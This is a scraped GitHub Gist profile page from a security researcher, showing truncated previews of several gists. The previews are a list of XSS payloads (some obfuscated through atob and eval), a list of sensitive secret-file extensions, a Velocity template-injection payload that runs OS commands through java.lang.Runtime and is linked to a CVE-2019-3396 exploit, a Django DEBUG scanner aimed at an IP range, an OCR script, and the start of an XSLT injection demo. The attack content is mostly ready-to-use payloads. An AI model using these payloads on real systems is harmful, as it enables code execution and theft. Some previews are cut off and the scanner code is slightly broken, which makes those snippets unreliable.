Skip to content

Instantly share code, notes, and snippets.

View CaptainFreak's full-sized avatar
💣
Pwning

Shoeb Patel CaptainFreak

💣
Pwning
View GitHub Profile
@CaptainFreak
CaptainFreak / XSs payloads
Created August 31, 2020 08:44
XSS PAYLOADS by @OFJAAAH
XSS PAYLOADS - @OFJAAAH
: \');confirm(1);//
<x/onmouSeenter=window[`\x61\x6c\x65\x72\x74`]`1337`
<script>prompt(1)</script>
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script>
Files:
======
"otr.private_key"
".agilekeychain"
".asc"
".bek"
".cscfg"
".dayone"
".exports"
".extra"
#set($engine="string")#set($run=$engine.getClass().forName("java.lang.Runtime"))#set($runtime=$run.getRuntime())#set($proc=$runtime.exec("ls"))#set($null=$proc.waitFor())#set($istr=$proc.getInputStream())#set($chr=$engine.getClass().forName("java.lang.Character"))#set($output="")#set($string=$engine.getClass().forName("java.lang.String"))#foreach($i in [1..$istr.available()])#set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))#end$output
https://raw.githubusercontent.com/CaptainFreak/CVE-2019-3396/master/os.vm
import requests
base = "http://104.254.204."
path = "/reporting/"
print "Django DEBUG=true Checker\n\n"
for i in range(255) :
print "Testing : "+base+str(1)+"/"
r = requests.get(base+str(1)+path)
if "ImportError" in r.text :
print ": Vulnerable"
else :
Just checkout all the commits one by one.
Simple ! but only if you know the fundamentals of Git commits ;).
@CaptainFreak
CaptainFreak / ocr.py
Created June 5, 2018 09:39
Le shubhya maje mar. {Script for evaluating expression from image}
###
# Usage : python ocr.py --image image_name.png --preprocess blur
###
from PIL import Image
import pytesseract
import argparse
import cv2
import os
ap = argparse.ArgumentParser()
@CaptainFreak
CaptainFreak / c.xml
Created February 17, 2018 05:11
XSLT Injection Demo
<?xml version="1.0" ?>
<fruits>
<fruit>
<name>Lemon</name>
<description>Yellow and sour</description>
</fruit>
<fruit>
<name>Watermelon</name>
<description>Round, green outside, red inside</description>
</fruit>